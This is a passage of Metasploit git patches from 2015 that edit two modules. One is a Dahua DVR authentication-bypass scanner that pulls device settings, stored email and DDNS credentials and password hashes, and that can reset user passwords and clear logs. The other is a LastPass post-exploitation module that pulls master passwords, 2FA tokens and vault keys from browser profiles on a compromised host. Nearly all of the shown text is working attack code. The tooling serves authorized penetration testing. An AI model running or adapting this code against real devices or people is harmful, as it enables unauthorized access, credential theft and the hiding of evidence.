address: ddns_server, - port: ddns_port, - service_name: 'ddns settings', - protocol: 'tcp', - workspace_id: myworkspace_id - } + def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + service_data = { + address: ddns_server, + port: ddns_port, + service_name: 'ddns settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } - credential_data = { - module_fullname: :fullname, - origin_type: :service, - private_data: ddns_pass, - private_type: :password, - username: ddns_user - }.merge(service_data) + credential_data = { + module_fullname: :fullname, + origin_type: :service, + private_data: ddns_pass, + private_type: :password, + username: ddns_user + }.merge(service_data) - login_data = { - core: create_credential(credential_data), - status: Metasploit::Model::Login::Status::UNTRIED - }.merge(service_data) + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) - create_credential_login(login_data) - end + create_credential_login(login_data) + end - def report_email_cred(mailserver, rport, muser, mpass) - service_data = { - address: mailserver, - port: rport, - service_name: 'email settings', - protocol: 'tcp', - workspace_id: myworkspace_id - } + def report_email_cred(mailserver, rport, muser, mpass) + service_data = { + address: mailserver, + port: rport, + service_name: 'email settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } - credential_data = { - module_fullname: :fullname, - origin_type: :service, - private_data: mpass, - private_type: :password, - username: muser - }.merge(service_data) + credential_data = { + module_fullname: :fullname, + origin_type: :service, + private_data: mpass, + private_type: :password, + username: muser + }.merge(service_data) - login_data = { - core: create_credential(credential_data), - status: Metasploit::Model::Login::Status::UNTRIED - }.merge(service_data) + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) - create_credential_login(login_data) - end + create_credential_login(login_data) + end end From 3d95bd7851060c406c4804c4a12e1b7b6824b30e Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Wed, 18 Nov 2015 10:40:50 -0500 Subject: [PATCH 015/686] fixed issue with msftidy and fixed rubocop issues that broke the module --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 31 ++++++++++--------- 1 file changed, 16 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 57a8fc9f0a..de75f38f07 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -82,12 +82,12 @@ class Metasploit3 < Msf::Auxiliary serial = Regexp.last_match[1] print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") end - + connect sock.put(email) - if data == sock.get(1024).split('&&') + if data = sock.get(1024).split('&&') print_status("Email Settings: @ #{rhost}:#{rport}!") if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ - if mailhost == Regexp.last_match[1].split(':') + if mailhost = Regexp.last_match[1].split(':') print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end @@ -105,9 +105,9 @@ class Metasploit3 < Msf::Auxiliary end end end - + connect sock.put(ddns) - if data == sock.get(1024) + if data = sock.get(1024) data = data.split(/&&[0-1]&&/) data.each_with_index do |val, index| if index > 0 @@ -132,9 +132,9 @@ class Metasploit3 < Msf::Auxiliary end end end - + connect sock.put(nas) - if data == sock.get(1024) + if data = sock.get(1024) print_status("Nas Settings @ #{rhost}:#{rport}!:") server = '' port = '' @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Auxiliary end end end - + connect sock.put(channels) data = sock.get(1024).split('&&') disconnect @@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary end connect sock.put(users) - if data == sock.get(1024).split('&&') + if data = sock.get(1024).split('&&') print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 @@ -186,12 +186,13 @@ class Metasploit3 < Msf::Auxiliary sname: 'dvr', name: 'Dahua Authentication Password Hash Exposure', info: "Obtained password hash for user #{username}: #{md5hash}", - refs: :references + refs: references ) end end + connect sock.put(groups) - if data == sock.get(1024).split('&&') + if data = sock.get(1024).split('&&') print_status("User Groups: @ #{rhost}:#{rport}!") data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end @@ -210,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary sock.put(u3) data = sock.get(1024) sock.put(u1) - if data == sock.get(1024) + if data = sock.get(1024) print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") end # elsif (datastore['ACTION'] == "DELETE") @@ -304,7 +305,7 @@ class Metasploit3 < Msf::Auxiliary } credential_data = { - module_fullname: :fullname, + module_fullname: fullname, origin_type: :service, private_data: hash, private_type: :nonreplayable_hash, @@ -330,7 +331,7 @@ class Metasploit3 < Msf::Auxiliary } credential_data = { - module_fullname: :fullname, + module_fullname: fullname, origin_type: :service, private_data: ddns_pass, private_type: :password, @@ -355,7 +356,7 @@ class Metasploit3 < Msf::Auxiliary } credential_data = { - module_fullname: :fullname, + module_fullname: fullname, origin_type: :service, private_data: mpass, private_type: :password, From 5acd9b283e884aaad3fbc2d308590182f88e5d8f Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Wed, 18 Nov 2015 11:54:32 -0500 Subject: [PATCH 016/686] removed misc comments that arent needed --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 75 +------------------ 1 file changed, 1 insertion(+), 74 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index de75f38f07..97ad3b2c6c 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -98,7 +98,6 @@ class Metasploit3 < Msf::Auxiliary mpass = "#{data[6]}" mailserver = "#{mailhost[0]}" print_good("MailServer: #{mailserver}") - # destemail = "#{data[1]}" if !mailhost[1].nil? if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? end @@ -178,7 +177,6 @@ class Metasploit3 < Msf::Auxiliary hash = "#{rhost} #{username}:$dahua$#{md5hash}" report_hash(ip, rport, user, hash) # Write the vulnerability to the database - # unless reported_vuln report_vuln( host: rhost, port: rport, @@ -205,85 +203,14 @@ class Metasploit3 < Msf::Auxiliary u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring sock.put(u1) - # data = sock.get(1024) sock.put(u2) - # data = sock.get(1024) sock.put(u3) data = sock.get(1024) sock.put(u1) if data = sock.get(1024) print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") end -# elsif (datastore['ACTION'] == "DELETE") -# u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -# u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -# delete = "\xa6\x00\x00\x00#{datastore['USERNAME'].length.chr}\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + -# datastore['USERNAME'] -# print delete -# sock.send(u1, 0) -# sock.get_once -# sock.send(delete, 0) -# sock.get_once -# sock.send(u2, 0) -# sock.get_once -# -# -# elsif (datastore['ACTION'] == "ADD") -# userstring = (usercount + 1).to_s + ":" + datastore['USERNAME'] + ":" + datastore['PASSWORD'] -# userstring << "\x3a\x31\x3a\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37" + -# "\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x32\x30\x2c\x32\x31" + -# "\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c" + -# "\x32\x37\x2c\x32\x38\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34" + -# "\x30\x2c\x34\x32\x2c\x34\x33\x2c\x34\x34\x2c\x34\x35\x2c\x34\x36" + -# "\x2c\x34\x37\x2c\x34\x38\x2c\x34\x39\x2c\x35\x30\x2c\x35\x31\x2c" + -# "\x35\x32\x2c\x35\x33\x2c\x35\x34\x2c\x35\x35\x2c\x35\x36\x2c\x35" + -# "\x37\x2c\x35\x38\x2c\x35\x39\x2c\x36\x30\x3a\x3a\x31" -# -# u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -# u3 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -# u4 = "\xa6\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -# u5 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00" + -# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + -# userstring -# sock.put(u1) -# sock.get(1024) -# sock.put(u1) -# sock.get(1024) -# sock.put(u2) -# sock.get(1024) -# sock.put(u3) -# sock.get(1024) -# sock.put(u2) -# sock.get(1024) -# sock.put(u3) -# sock.get(1024) -# sock.put(u4) -# sock.get(1024) -# sock.put(groups) -# sock.get(1024) -# sock.put(users) -# sock.get(1024) -# sock.put(u5) -# sock.get(1024) -# sock.put(u2) -# sock.get(1024) -# sock.put(u3) -# sock.get(1024) -# sock.put(u4) -# sock.put(1024) -# sock.put(groups) -# sock.get(1024) -# sock.put(users) -# sock.put(1024) -# print_good("ADDED USER!: user #{datastore['USERNAME']}'s password is #{datastore['PASSWORD']}") -# -# else + end if datastore['CLEAR_LOGS'] From f34c7a8594683d307fbee739512e07e66c0f54f6 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Fri, 20 Nov 2015 23:42:59 -0800 Subject: [PATCH 017/686] Support for new Firefox method to store credentials --- modules/post/multi/gather/lastpass_creds.rb | 64 ++++++++++++--------- 1 file changed, 36 insertions(+), 28 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index e8377feb01..9a6fb32546 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Post super( update_info( info, - 'Name' => 'LastPass Master Password Extractor', + 'Name' => 'LastPass Vault Decryptor', 'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords, encryption keys, 2FA tokens and all the vault passwords', 'License' => MSF_LICENSE, 'Author' => [ @@ -45,9 +45,6 @@ class Metasploit3 < Msf::Post print_status "Extracting credentials" extract_credentials(account_map) - #print_status "Decrypting local stored key" - #decrypt_local_vault_key(account_map) - print_status "Extracting 2FA tokens" extract_2fa_tokens(account_map) @@ -118,7 +115,7 @@ class Metasploit3 < Msf::Post } localstorage_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - 'Firefox' => "#{user_profile['LocalAppData']}/LastPass", + 'Firefox' => "#{user_profile['AppData']}/Containers/com.lastpass.LastPass/Data/Library/Application Support/LastPass", 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } @@ -254,28 +251,32 @@ class Metasploit3 < Msf::Post end # Parses the Firefox preferences file and returns encoded credentials - def firefox_credentials(loot_path) + def firefox_credentials(prefs_path, localstorage_db_path) credentials = [] - File.readlines(loot_path).each do |line| + File.readlines(prefs_path).each do |line| if /user_pref\("extensions.lastpass.loginusers", "(?.*)"\);/ =~ line usernames = encoded_users.split("|") usernames.each do |username| credentials << [username, nil] end - elsif /user_pref\("extensions.lastpass.loginpws", "(?.*)"\);/ =~ line - creds_per_user = encoded_creds.split("|") - creds_per_user.each do |user_creds| - parts = user_creds.split('=') - for creds in credentials # Check if we have the username already - if creds[0] == parts[0] - creds[1] = parts[1] # Add the password to the existing username - else - credentials << parts if parts.size > 1 # Add full credentials - end - end + break + end + end + + # Extract master passwords + path = localstorage_db_path + client.fs.file.separator + "lp.loginpws" + data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + data = windows_unprotect(data) if data != nil && data.match(/^AQAAA.+/) # Verify Windows protection + data.blank? ? return : data = Base64.decode64(data) + creds_per_user = data.split("|") + creds_per_user.each do |user_creds| + parts = user_creds.split('=') + for creds in credentials # Check if we have the username already + if creds[0] == parts[0] + creds[1] = parts[1] # Add the password to the existing username + else + credentials << parts if parts.size > 1 # Add full credentials end - else - next end end @@ -321,7 +322,7 @@ class Metasploit3 < Msf::Post ) # Extract usernames and passwords from preference file - ffcreds = firefox_credentials(loot_path) + ffcreds = firefox_credentials(loot_path, paths['localstorage_db'] ) unless ffcreds.blank? ffcreds.each do |creds| if creds[1].blank? # No master password found @@ -416,13 +417,13 @@ class Metasploit3 < Msf::Post lastpass_data_table = Rex::Ui::Text::Table.new( 'Header' => "LastPass Accounts", 'Indent' => 1, - 'Columns' => %w(Account LP_Username LP_Password LP_2FA LP_Key) + 'Columns' => %w(Account Browser LP_Username LP_Password LP_2FA LP_Key) ) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - lastpass_data_table << [account, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] + lastpass_data_table << [account, browser, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] end end end @@ -459,8 +460,15 @@ class Metasploit3 < Msf::Post nil, "#{account}'s #{browser} LastPass iterations" ) - path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" - vault = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + path = client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + if client.fs.file.exists?(path + "_lps.act.sxml") + path = path + "_lps.act.sxml" + elsif client.fs.file.exists?(path + "_lps.sxml") + path = path + "_lps.sxml" + else + next # No vault found + end + vault = read_file(path) vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection vault = vault.sub(/iterations=.*;/, "") # Remove iterations info loot_path = store_loot( @@ -526,9 +534,9 @@ class Metasploit3 < Msf::Post decrypt_local_vault_key(account, browser_map) browser_checked = true end - if lp_data['lp_creds'][username]['vault_key'] == nil # If not vault key was found yet, try with dOTP - otpbin = extract_otpbin(account, browser, username, lp_data) - lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) + if lp_data['lp_creds'][username]['vault_key'] == nil # If no vault key was found yet, try with dOTP + ##otpbin = extract_otpbin(account, browser, username, lp_data) + ##lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otpbin) end end end From 9d747e67a32d672bbf8a9f46b0ed7c5fe93e90cb Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Wed, 25 Nov 2015 21:28:07 -0800 Subject: [PATCH 018/686] Fix bugs in new Firefox creds storage --- modules/post/multi/gather/lastpass_creds.rb | 171 +++++++------------- 1 file changed, 57 insertions(+), 114 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 9a6fb32546..96a4981498 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -74,12 +74,14 @@ class Metasploit3 < Msf::Post browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", + 'IE' => "HKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\LastPass", 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } localstorage_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", 'Firefox' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } @@ -136,12 +138,12 @@ class Metasploit3 < Msf::Post if db_paths && db_paths.size > 0 account_map[account][browser]['lp_db_path'] = db_paths if session.type == "meterpreter" - account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser == 'Firefox' - account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if client.fs.file.exists?(cookies_path_map[browser]) || browser == 'Firefox' + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if client.fs.file.exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) #account_map[account][browser]['cookies_db'] = cookies_path_map[browser]['lp_db_path'].gsub("prefs.js", "cookies.sqlite") if client.fs.file.exists?(cookies_path_map[browser]['lp_db_path']) && browser == 'Firefox' else # session.type == "shell" - account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if session.shell_command("ls \"#{localstorage_path_map[browser]}\"").strip == localstorage_path_map[browser].strip || browser == 'Firefox' - account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if session.shell_command("ls \"#{cookies_path_map[browser]}\"").strip == cookies_path_map[browser].strip || browser == 'Firefox' + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if session.shell_command("ls \"#{localstorage_path_map[browser]}\"").strip == localstorage_path_map[browser].strip || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if session.shell_command("ls \"#{cookies_path_map[browser]}\"").strip == cookies_path_map[browser].strip || browser.match(/Firefox|IE/) #account_map[account][browser]['cookies_db'] = cookies_path_map[browser]['lp_db_path'] if session.shell_command("ls \"#{cookies_path_map[browser]['lp_db_path']}\"").strip == cookies_path_map[browser]['lp_db_path'].strip && browser == 'Firefox' end else @@ -158,7 +160,9 @@ class Metasploit3 < Msf::Post paths = [] vprint_status "Checking #{account}'s #{browser}" - if browser == "Firefox" # Special case for Firefox + if browser == "IE" # Special case for IE + ## Check the Registry to see if there are any accounts. if not return empty array "paths" + elsif browser == "Firefox" # Special case for Firefox profiles = firefox_profile_files(path, browser) paths |= profiles else @@ -265,21 +269,21 @@ class Metasploit3 < Msf::Post # Extract master passwords path = localstorage_db_path + client.fs.file.separator + "lp.loginpws" - data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + begin + data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + rescue EOFError + vprint_error "File #{path} is empty" + data = nil + end data = windows_unprotect(data) if data != nil && data.match(/^AQAAA.+/) # Verify Windows protection - data.blank? ? return : data = Base64.decode64(data) + return credentials if data.blank? # No passwords stored creds_per_user = data.split("|") - creds_per_user.each do |user_creds| + creds_per_user.each_with_index do |user_creds, index| parts = user_creds.split('=') - for creds in credentials # Check if we have the username already - if creds[0] == parts[0] - creds[1] = parts[1] # Add the password to the existing username - else - credentials << parts if parts.size > 1 # Add full credentials - end + for creds in credentials + creds[1] = parts[1] if creds[0] == parts[0] # Add the password to the existing username end end - credentials end @@ -311,18 +315,8 @@ class Metasploit3 < Msf::Post account_map[account][browser]['lp_creds'] = {} if browser == 'Firefox' paths['lp_db_path'].each do |path| - data = read_file(path) - loot_path = store_loot( - 'firefox.preferences', - 'text/javascript', - session, - data, - nil, - "Firefox preferences file #{path}" - ) - - # Extract usernames and passwords from preference file - ffcreds = firefox_credentials(loot_path, paths['localstorage_db'] ) + loot_path = loot_file(path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file #{path}") + ffcreds = firefox_credentials(loot_path, paths['localstorage_db'] ) # Extract usernames and passwords from preference file unless ffcreds.blank? ffcreds.each do |creds| if creds[1].blank? # No master password found @@ -339,15 +333,7 @@ class Metasploit3 < Msf::Post end else # Chrome, Safari and Opera paths['lp_db_path'].each do |path| - data = read_file(path) - loot_path = store_loot( - "#{browser.downcase}.lastpass.database", - 'application/x-sqlite3', - session, - data, - nil, - "#{account}'s #{browser} LastPass database #{path}" - ) + loot_path = loot_file(path, nil, "#{browser.downcase}.lastpass.database", "application/x-sqlite3", "#{account}'s #{browser} LastPass database #{path}") account_map[account][browser]['lp_db_loot'] = loot_path # Parsing/Querying the DB @@ -379,27 +365,10 @@ class Metasploit3 < Msf::Post path = lp_data['localstorage_db'] + client.fs.file.separator + "lp.suid" data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection - loot_path = store_loot( - 'firefox.preferences', - 'text/binary', - session, - data, - nil, - "Firefox 2FA token file #{path}" - ) + loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") account_map[account][browser]['lp_2fa'] = data else # Chrome, Safari and Opera - data = read_file(lp_data['localstorage_db']) - loot_path = store_loot( - "#{browser.downcase}.lastpass.localstorage", - 'application/x-sqlite3', - session, - data, - nil, - "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}" - ) - - # Parsing/Querying the DB + loot_path = loot_file(lp_data['localstorage_db'], nil, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") db = SQLite3::Database.new(loot_path) token = db.execute( "SELECT hex(value) FROM ItemTable " \ @@ -430,15 +399,7 @@ class Metasploit3 < Msf::Post unless account_map.empty? print_good lastpass_data_table.to_s - path = store_loot( - "lastpass.data", - "text/csv", - session, - lastpass_data_table.to_csv, - nil, - "LastPass Data" - ) - + loot_file(nil, lastpass_data_table.to_csv, "lastpass.data", "text/csv", "LastPass Data") print_vault_passwords(account_map) end end @@ -447,38 +408,23 @@ class Metasploit3 < Msf::Post account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - if browser == 'Firefox' - path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" - iterations = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + if browser.match(/Firefox|IE/) + if browser == "Firefox" + iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + else # IE + iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" + end + iterations = read_file(iterations_path) if client.fs.file.exists?(iterations_path) # Read file if it exists iterations = nil if iterations.blank? # Verify content lp_data['lp_creds'][username]['iterations'] = iterations - loot_path = store_loot( - "#{browser.downcase}.lastpass.iterations", - 'text/plain', - session, - iterations, - nil, - "#{account}'s #{browser} LastPass iterations" - ) - path = client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) - if client.fs.file.exists?(path + "_lps.act.sxml") - path = path + "_lps.act.sxml" - elsif client.fs.file.exists?(path + "_lps.sxml") - path = path + "_lps.sxml" - else - next # No vault found - end - vault = read_file(path) + + # Find encrypted vault + vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" + vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" if !client.fs.file.exists?(vault_path) + vault = read_file(vault_path) vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection - vault = vault.sub(/iterations=.*;/, "") # Remove iterations info - loot_path = store_loot( - "#{browser.downcase}.lastpass.vault", - 'text/plain', - session, - vault, - nil, - "#{account}'s #{browser} LastPass Vault" - ) + vault = vault.sub(/iterations=.*;/, "") if client.fs.file.exists?(vault_path) # Remove iterations info + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") lp_data['lp_creds'][username]['vault_loot'] = loot_path else # Chrome, Safari and Opera @@ -491,27 +437,11 @@ class Metasploit3 < Msf::Post if result.size == 1 && !result[0].blank? if /iterations=(?.*);(?.*)/ =~ result[0][0] lp_data['lp_creds'][username]['iterations'] = iterations - loot_path = store_loot( - "#{browser.downcase}.lastpass.iterations", - 'text/plain', - session, - vault, - nil, - "#{account}'s #{browser} LastPass iterations" - ) - lp_data['lp_creds'][username]['vault_loot'] = loot_path else lp_data['lp_creds'][username]['iterations'] = 1 - loot_path = store_loot( - "#{browser.downcase}.lastpass.vault", - 'text/plain', - session, - result[0][0], - nil, - "#{account}'s #{browser} LastPass Vault" - ) - lp_data['lp_creds'][username]['vault_loot'] = loot_path end + loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") + lp_data['lp_creds'][username]['vault_loot'] = loot_path else lp_data['lp_creds'][username]['iterations'] = nil lp_data['lp_creds'][username]['vault_loot'] = nil @@ -525,13 +455,13 @@ class Metasploit3 < Msf::Post def extract_vault_keys(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| - browser_checked = false # Track if local stored vault key was already decrypted for this browser + browser_checked = false # Track if local stored vault key was already decrypted for this browser (only one session cookie) lp_data['lp_creds'].each_pair do |username, user_data| if !user_data['lp_password'].blank? && user_data['iterations'] != nil # Derive vault key from credentials lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) else # Get vault key decrypting the locally stored one or from the disabled OTP if !browser_checked - decrypt_local_vault_key(account, browser_map) + #decrypt_local_vault_key(account, browser_map) browser_checked = true end if lp_data['lp_creds'][username]['vault_key'] == nil # If no vault key was found yet, try with dOTP @@ -570,7 +500,6 @@ class Metasploit3 < Msf::Post nil, "#{account}'s #{browser} cookies DB" ) - # Parsing/Querying the DB db = SQLite3::Database.new(loot_path) begin @@ -799,4 +728,18 @@ class Metasploit3 < Msf::Post end end + # Reads a remote file and loots it + def loot_file(path, data, title, type, description) + data = read_file(path) if data == nil + loot_path = store_loot( + title, + type, + session, + data, + nil, + description + ) + return loot_path + end + end From cb60b41d5d972d7e4200390e300ebaa3ec942ffb Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 1 Dec 2015 10:43:58 -0500 Subject: [PATCH 019/686] added in fixes and missing typos, randomized the password for the user --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 97ad3b2c6c..1c2f034e52 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -5,9 +5,9 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Dahua DVR Auth Bypas Scanner', - 'Version' => '$Revision: 1 $', - 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', + 'Name' => %q(Dahua DVR Auth Bypass Scanner), + 'Version' => '$Revision: 1.1 $', + 'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs), 'Author' => [ 'Jake Reynolds - Depth Security', # Vulnerability Discoverer 'Tyler Bennett - Talos Infosec' # Metasploit Module @@ -20,12 +20,17 @@ class Metasploit3 < Msf::Auxiliary ) deregister_options('RHOST') register_options([ - OptString.new('USERNAME', [true, 'A username to reset', '888888']), - OptString.new('PASSWORD', 